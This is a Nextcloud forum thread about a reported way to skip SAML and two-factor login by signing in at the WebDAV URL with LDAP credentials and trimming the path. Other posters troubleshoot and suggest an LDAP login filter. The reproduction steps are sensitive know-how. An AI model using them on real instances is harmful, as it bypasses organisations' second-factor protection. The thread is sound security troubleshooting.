Saml authentication bypass vulnerability

Vorchmaster · November 19, 2023, 11:38pm

Nextcloud version 25.0.7
Ubuntu 20.04.6
Apache v ersion2.4.41-4ubuntu3.14
PHP version 7.4

Good day! I am using LDAP and SAML apps in my nextcloud instance, and I faced the problem of bypass SAML authentication in browser.

Steps to replicate it:

Open https://<instance_name>/remote.php/dav/files/<user_name>
Enter correct credentials
Delete <user_name> from URL
Step by step delete from url files/ ; dav/ ; remote.php
Cheers, you are logged in without SAML.

In case of my IDP, providing 2fa with SAML auth, such a bypass is a vulnerability.

Does anyone know, how it can be fixed without app password for dav clients?

When you enter correct credentials in browser opening https://<instance_name>/remote.php/dav/files/, there is a page, telling: This is the WebDAV interface. It can only be accessed by WebDAV clients such as the Next cloud desktop sync client. Probably, there is a possibility to convert this message to an error for browsers?

Thank you in advance!

dugite-code · November 20, 2023, 1:51am

Enter correct credentials

Do you mean enter the app password? I believe this is expected as the app password isn’t scoped ~~in any way~~ except for filesystem access. You could always log in via the app password from https://<instance_name>/index.php/login?direct=1

SysKeeper · November 20, 2023, 8:26am

Hey,

thanks for your report! Can you please share your SAML configuration (remove any sensitive information) with us?

Thank you!

SysKeeper · November 20, 2023, 8:51am

Just noticed that all versions you’re using are heavily outdated and not supported anymore. Does the same happen on supported versions?
See Maintenance and Release Schedule · nextcloud/server Wiki · GitHub

blizzz · November 20, 2023, 9:20am

Also,

Do those match against a e.g. local user?

Kerasit · November 20, 2023, 10:14am

This must be a version thing. Just tested in both lab setup and production. I cannot replicate this.

I could - however - bypass SAML if using an app password. Which is expected.

Vorchmaster · November 20, 2023, 11:15am

Is it correct? You open https://<instance_name>/remote.php/dav/files/<user_name>, and get redirect to SAML authentication?

Kerasit · November 20, 2023, 11:17am

I cannot login with browser to WebDav. This is expected. I am presented with a creds pop up. I enters my Creds, and is sent to an “internal server error”. Trying to browse to anything (deleting part of url) I am redirected to login page.

You cannot use SAML with WebDAV. It is not support by the devices using DAV to access filesystems. It only supports username-password.

But I cannot bypass it to gain access to anything.

Vorchmaster · November 21, 2023, 3:50pm

Sounds great, do you have “Enforce two-factor authentication” checkbox enabled?

Vorchmaster · November 22, 2023, 9:18am

In addition, I updated stand to 25.0.13, and I still have the same issue. Could you specify your version?

Vorchmaster · November 22, 2023, 9:21am

I meant normal password, I am trying to avoid using app passwords although my issue could be got over by forcing usage of app passwords.

dugite-code · November 22, 2023, 9:34am

I believe that’s because you are using a user that has their backend set to local. It needs to be a user_saml backend

For example for my user I see:

sudo docker exec -it -u 33 nextcloud_app php occ user:info dugite-code

  - user_id: dugite-code
  - display_name: dugite-code
  - email: dugite-code
  - cloud_id: dugite-code@example.tld
  - enabled: true
  - groups:
    - Nextcloud
    - admin
    - authentik Admins
    - nextcloud_admin
  - quota: none
  - storage:
    - free: 40330010624
    - used: 1120800088
    - total: 41450810712
    - relative: 2.7
    - quota: -3
  - last_seen: 2023-11-22T09:23:51+00:00
  - user_directory: /var/www/html/data/dugite-code
  - backend: user_saml

I don’t believe there is an easy way to change existing users and it requires modifying the DB. New users created by the SAML plugin will have the user_saml backend automatically

Vorchmaster · November 22, 2023, 9:46am

I use LDAP for backend, so yes, no my users have backend user_saml

SysKeeper · November 22, 2023, 10:43am

To repeat what was written already

Can you please share your user_saml configuration?
Do the credentials match a locally existing user/password?

Vorchmaster · November 22, 2023, 11:23am

That’s all that i could get with occ config:list user_saml:
“user_saml”: {
“enabled”: “yes”,
“general-require_provisioned_account”: “1”,
“general-use_saml_auth_for_desktop”: “1”,
“installed_version”: “5.2.0”,
“type”: “saml”,
“types”: “authentication”
}
Do you need something more specific?

And I don’t store credentials locally

blizzz · November 22, 2023, 9:43pm

Then the login works through LDAP. Set a login filter that never qualifies.

Vorchmaster · November 24, 2023, 8:48am

This will affect the use of desktop dav clients, won’t it?

blizzz · November 24, 2023, 12:00pm

What? My suggestion? That should not be the case, provided they authed properly with SAML when setting up the client.

Kerasit · November 27, 2023, 9:25am

Perhaps?

SysKeeper · November 28, 2023, 7:11am